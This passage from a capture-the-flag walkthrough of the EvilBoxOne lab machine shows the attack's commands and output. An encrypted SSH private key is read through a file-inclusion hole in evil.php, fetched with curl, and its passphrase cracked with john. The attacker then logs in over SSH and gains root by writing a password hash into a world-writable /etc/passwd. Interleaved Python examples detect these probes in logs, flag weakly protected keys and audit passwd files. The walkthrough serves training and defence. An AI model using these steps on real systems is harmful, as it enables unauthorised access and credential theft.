输出 >>>/home/mowree/.ssh/id_dsa.pub:
输出 >>>/home/mowree/.ssh/id_rsa:
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
输出 >>>/home/mowree/.ssh/id_rsa.pub:
输出 >>>/home/mowree/.ssh/ssh_host_dsa_key:
输出 >>>/home/mowree/.ssh/ssh_host_dsa_key.pub:
输出 >>>/home/mowree/.ssh/ssh_host_key:
输出 >>>/home/mowree/.ssh/ssh_host_key.pub:
输出 >>>/home/mowree/.ssh/ssh_host_rsa_key:
输出 >>>/home/mowree/.ssh/ssh_host_rsa_key.pub:
Jackpot:
- /home/mowree/.ssh/authorized_keys
  ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne
- /home/mowree/.ssh/id_rsa
  -----BEGIN RSA PRIVATE KEY-----
  Proc-Type: 4,ENCRYPTED
  DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

  uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
  hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
  o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
  +gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
  b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
  HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
  9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
  zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
  rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
  tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
  94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
  VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
  Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
  hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
  Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
  IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
  MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
  62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
  Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
  p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
  pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
  KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
  i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
  4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
  8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
  -----END RSA PRIVATE KEY-----
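Every probe in this section, from the first ../robots.txt through the file.txt and ssh_dict.txt loops, lands in the web server's access log, and that is where a defender would catch it. As an added example (not part of the original post), the Python below scans Apache combined-format log lines for exactly those request shapes and flags a client that either sends an inclusion indicator (traversal, php:// wrapper, remote URL, sensitive absolute path) or cycles through many distinct values against one script, which is what the ffuf and wordlist loops look like even when no single value is suspicious. The log lines are constructed to mirror this walkthrough; the indicator patterns and the enumeration threshold are my assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format; only the fields the analysis needs are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Indicator name -> pattern tested against each URL-decoded query value.
INDICATORS = {
    "traversal": re.compile(r"(^|[\\/])\.\.([\\/]|$)"),
    "wrapper":   re.compile(r"^(php|data|expect|phar|zip|glob)://", re.I),
    "remote":    re.compile(r"^(https?|ftp)://", re.I),
    "sensitive": re.compile(r"^/(etc|root|home/[^/]+/\.ssh|var/log|proc)(/|$)"),
}


def scan_line(line: str) -> Optional[dict]:
    """Parse one log line; return client, script path, query and matched indicators."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    hits = set()
    for _, value in parse_qsl(url.query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded payloads
        for name, pattern in INDICATORS.items():
            if pattern.search(value):
                hits.add(name)
    return {"ip": m["ip"], "path": url.path, "query": url.query, "hits": sorted(hits)}


def analyze(lines: List[str], enum_threshold: int = 20) -> Dict[Tuple[str, str], dict]:
    """Aggregate per (client, script) and attach verdicts.

    'lfi-probe' needs at least one indicator match; 'enumeration' fires when
    one client sends more than enum_threshold distinct query strings to one
    script, which is what the ffuf and wordlist loops above look like even
    when no individual value is suspicious on its own.
    """
    stats: Dict[Tuple[str, str], dict] = {}
    for line in lines:
        rec = scan_line(line)
        if rec is None:
            continue
        s = stats.setdefault((rec["ip"], rec["path"]),
                             {"requests": 0, "values": set(), "indicators": {}})
        s["requests"] += 1
        s["values"].add(rec["query"])
        for name in rec["hits"]:
            s["indicators"][name] = s["indicators"].get(name, 0) + 1
    report = {}
    for key, s in stats.items():
        verdicts = []
        if s["indicators"]:
            verdicts.append("lfi-probe")
        if len(s["values"]) > enum_threshold:
            verdicts.append("enumeration")
        report[key] = {"requests": s["requests"], "distinct_values": len(s["values"]),
                       "indicators": s["indicators"], "verdicts": verdicts}
    return report


def _line(ip: str, target: str, size: int = 12) -> str:
    """Constructed combined-format line (timestamp and agent are fixed filler)."""
    return (f'{ip} - - [09/Nov/2022:19:35:29 +0800] "GET {target} HTTP/1.1" 200 {size} '
            f'"-" "curl/7.85.0"')


# Constructed sample: the walkthrough's probes from one client, plus a second
# client running a 25-word parameter fuzz with no suspicious values at all.
SAMPLE_LOG = [
    _line("192.168.56.116", "/index.html", 10701),
    _line("192.168.56.116", "/secret/evil.php?command=header"),
    _line("192.168.56.116", "/secret/evil.php?command=../robots.txt"),
    _line("192.168.56.116", "/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=./evil.php", 92),
    _line("192.168.56.116", "/secret/evil.php?command=http://192.168.56.116:80/var.txt", 0),
    _line("192.168.56.116", "/secret/evil.php?command=/etc/passwd", 1401),
    _line("192.168.56.116", "/secret/evil.php?command=/home/mowree/.ssh/id_rsa", 1766),
] + [_line("192.168.56.120", f"/secret/evil.php?command=word{i}", 0) for i in range(25)]


if __name__ == "__main__":
    for (ip, path), r in analyze(SAMPLE_LOG).items():
        print(ip, path, r["requests"], r["indicators"], r["verdicts"])
```

The enumeration rule is the one that matters in practice: a 0-byte response to each of hundreds of thousands of requests against one script from one address (the gobuster and ffuf runs above took 700k and 110k requests) is visible in the log long before any individual payload is, and needs no payload signature at all.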
We have obtained mowree's public and private keys outright; with the stolen private key we can attack directly.
- Steal it with this command chain:
  touch id_rsa && curl "http://192.168.56.117/secret/evil.php?command=/home/mowree/.ssh/id_rsa" > id_rsa && chmod 600 id_rsa
- Try to log in:
  ssh mowree@192.168.56.117 -i id_rsa
  - -i specifies the key used for authentication
  ┌──(kali㉿kali)-[~/workspace]
  └─$ ssh mowree@192.168.56.117 -i id_rsa
  The authenticity of host '192.168.56.117 (192.168.56.117)' can't be established.
  ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
  This key is not known by any other names
  Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  Enter passphrase for key 'id_rsa':
Logging in asks for a passphrase, so for now try cracking it with john.
- First convert the private key into a format john understands:
  /usr/share/john/ssh2john.py ./id_rsa > ./hash_id_rsa
- Crack it:
  john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt
  If rockyou.txt is missing, decompress rockyou.txt.gz with sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
  ┌──(kali㉿kali)-[~/workspace]
  └─$ john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt
  Using default input encoding: UTF-8
  Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
  Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
  Cost 2 (iteration count) is 2 for all loaded hashes
  Press 'q' or Ctrl-C to abort, almost any other key for status
  unicorn          (./id_rsa)
  1g 0:00:00:00 DONE (2022-11-10 19:22) 50.00g/s 62100p/s 62100c/s 62100C/s unicorn
  Use the "--show" option to display all of the cracked passwords reliably
  Session completed.
- The result is unicorn
  ┌──(kali㉿kali)-[~/workspace]
  └─$ ssh mowree@192.168.56.117 -i id_rsa
  Enter passphrase for key 'id_rsa':
  Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
  mowree@EvilBoxOne:~$ id
  uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
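Why the passphrase fell in well under a second: the stolen key is in the legacy PEM container (Proc-Type: 4,ENCRYPTED with DEK-Info: DES-EDE3-CBC), whose passphrase-to-key derivation is a single MD5 pass over passphrase and salt, which is what john reports above as cost "1=MD5/3DES". Keys written with ssh-keygen -o, the default since OpenSSH 7.8, use the OPENSSH PRIVATE KEY container with a bcrypt KDF and a tunable round count, the "2=Bcrypt/AES" case in the same john line. As an added example (not from the original post), the Python below reads a key file's header and reports which protection it carries, so weakly wrapped keys can be found on a fleet and rewrapped. The sample keys are constructed from headers only, not the box's key, and the threshold of 16 bcrypt rounds (ssh-keygen's default) for calling a bcrypt-wrapped key weak is my assumption.

```python
import base64
import re
import struct
from typing import Optional


def _ssh_string(data: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def make_openssh_header(cipher: str, kdf: str, salt: bytes = b"", rounds: int = 0) -> str:
    """Constructed OPENSSH PRIVATE KEY container carrying only the header
    fields (magic, cipher, kdf, kdf options, key count); no key material."""
    kdfopts = (_ssh_string(salt) + struct.pack(">I", rounds)) if kdf == "bcrypt" else b""
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher.encode())
            + _ssh_string(kdf.encode()) + _ssh_string(kdfopts) + struct.pack(">I", 1))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


def classify_private_key(text: str) -> dict:
    """Report container format, cipher, KDF and whether the protection is weak."""
    if "-----BEGIN OPENSSH PRIVATE KEY-----" in text:
        body = "".join(l for l in text.splitlines() if l and not l.startswith("-----"))
        blob = base64.b64decode(body)
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(magic)

        def take() -> bytes:
            nonlocal off
            (n,) = struct.unpack_from(">I", blob, off)
            off += 4
            chunk = blob[off:off + n]
            off += n
            return chunk

        cipher, kdf, opts = take().decode(), take().decode(), take()
        rounds: Optional[int] = None
        if kdf == "bcrypt":
            (salt_len,) = struct.unpack_from(">I", opts, 0)
            (rounds,) = struct.unpack_from(">I", opts, 4 + salt_len)
        encrypted = cipher != "none"
        return {"format": "openssh", "encrypted": encrypted, "cipher": cipher,
                "kdf": kdf, "rounds": rounds,
                "weak": (not encrypted) or (kdf == "bcrypt" and rounds < 16)}
    if re.search(r"-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", text):
        dek = re.search(r"DEK-Info:\s*([A-Za-z0-9-]+),([0-9A-Fa-f]+)", text)
        encrypted = "Proc-Type: 4,ENCRYPTED" in text and dek is not None
        # Legacy PEM is either plaintext or one MD5 pass over passphrase+salt
        # (OpenSSL EVP_BytesToKey), so it is weak either way.
        return {"format": "legacy-pem", "encrypted": encrypted,
                "cipher": dek.group(1) if dek else "none",
                "kdf": "md5" if encrypted else "none",
                "rounds": 1 if encrypted else None, "weak": True}
    raise ValueError("unrecognised private key container")


# Constructed samples: headers only, no real key material.
LEGACY_3DES = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: DES-EDE3-CBC,0123456789ABCDEF\n\n"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
    "-----END RSA PRIVATE KEY-----\n"
)
OPENSSH_BCRYPT = make_openssh_header("aes256-ctr", "bcrypt", b"\x00" * 16, 100)
OPENSSH_PLAIN = make_openssh_header("none", "none")


if __name__ == "__main__":
    for label, key in [("legacy", LEGACY_3DES), ("bcrypt", OPENSSH_BCRYPT), ("plain", OPENSSH_PLAIN)]:
        print(label, classify_private_key(key))
```

An existing key is rewrapped in place with ssh-keygen -p -o -a 100 -f id_rsa (new format, 100 bcrypt rounds); on the box that alone would have turned a sub-second rockyou run into one costing many orders of magnitude more per guess, though it still would not have protected a passphrase as weak as the one found.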
Login succeeded; on to the next step.
Privilege escalation
Explore the directory tree and find the first flag:
mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
Naturally we still need to escalate to root.
- Check sudo: nothing.
- Check the kernel version: no usable kernel exploit either.
- Check whether there are any hidden files we have write permission on:
  find / -writable 2>/dev/null | grep 'etc'
  The configuration directory is usually the first place to look.
  mowree@EvilBoxOne:~$ find / -writable 2>/dev/null | grep 'etc'
  /etc/passwd
- That file again: /etc/passwd
- If this file is writable, a user's password can be forcibly overwritten.
- Choose a password, 123, and generate its hash with openssl passwd -1: $1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/
- Tamper with /etc/passwd:
  root:$1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/:0:0:root:/root:/bin/bash
- Log in with su root:
  mowree@EvilBoxOne:~$ su root
  Contraseña: 
  root@EvilBoxOne:/home/mowree# id
  uid=0(root) gid=0(root) grupos=0(root)
Result:
root@EvilBoxOne:/home/mowree# ls
user.txt
root@EvilBoxOne:/home/mowree# cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
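The escalation relied on two conditions that are both easy to audit: /etc/passwd being writable by an unprivileged user, and a hash sitting in the second field in place of the x marker that defers to /etc/shadow (su and PAM accept such a hash directly). As an added example (not from the original post), the Python below checks a passwd file's content and mode for both, plus two related misconfigurations, a non-root uid 0 account and a malformed line. The passwd text mirrors the box before and after the tampering, and the 0666 mode is an assumption; the page only shows that find reported the file writable.

```python
import stat
from typing import List

# Shadow-file markers that are legitimate in the second field of /etc/passwd.
SHADOW_MARKERS = {"x", "*", "!", "!!"}


def audit_passwd(text: str, mode: int) -> List[str]:
    """Return findings for a passwd file from its content and st_mode.

    Checks: the file is writable by group or others; an entry carries a real
    hash (or nothing) in the password field instead of a shadow marker; an
    account other than root has uid 0; a line does not have seven fields.
    """
    findings: List[str] = []
    if mode & stat.S_IWOTH:
        findings.append("mode: world-writable (o+w)")
    if mode & stat.S_IWGRP:
        findings.append("mode: group-writable (g+w)")
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {n}: malformed entry with {len(fields)} fields")
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append(f"line {n}: {name} has an empty password field")
        elif pw not in SHADOW_MARKERS:
            findings.append(f"line {n}: {name} carries a password hash in /etc/passwd")
        if uid == "0" and name != "root":
            findings.append(f"line {n}: {name} has uid 0")
    return findings


# Constructed content mirroring the box before and after the tampering.
CLEAN = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash\n"
)
TAMPERED = (
    "root:$1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/:0:0:root:/root:/bin/bash\n"
    "mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash\n"
)
NORMAL_MODE = stat.S_IFREG | 0o644   # what a Debian install ships
BOX_MODE = stat.S_IFREG | 0o666      # assumed: writable by everyone, as find reported on the box


if __name__ == "__main__":
    print("clean    :", audit_passwd(CLEAN, NORMAL_MODE))
    print("tampered :", audit_passwd(TAMPERED, BOX_MODE))
```

On a live host the same two checks are one-liners: stat -c '%a %U:%G' /etc/passwd for the mode, and awk -F: '$2 != "x"' /etc/passwd for any entry that no longer defers to the shadow file; either firing on a Debian system is worth an alert.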
GAME OVER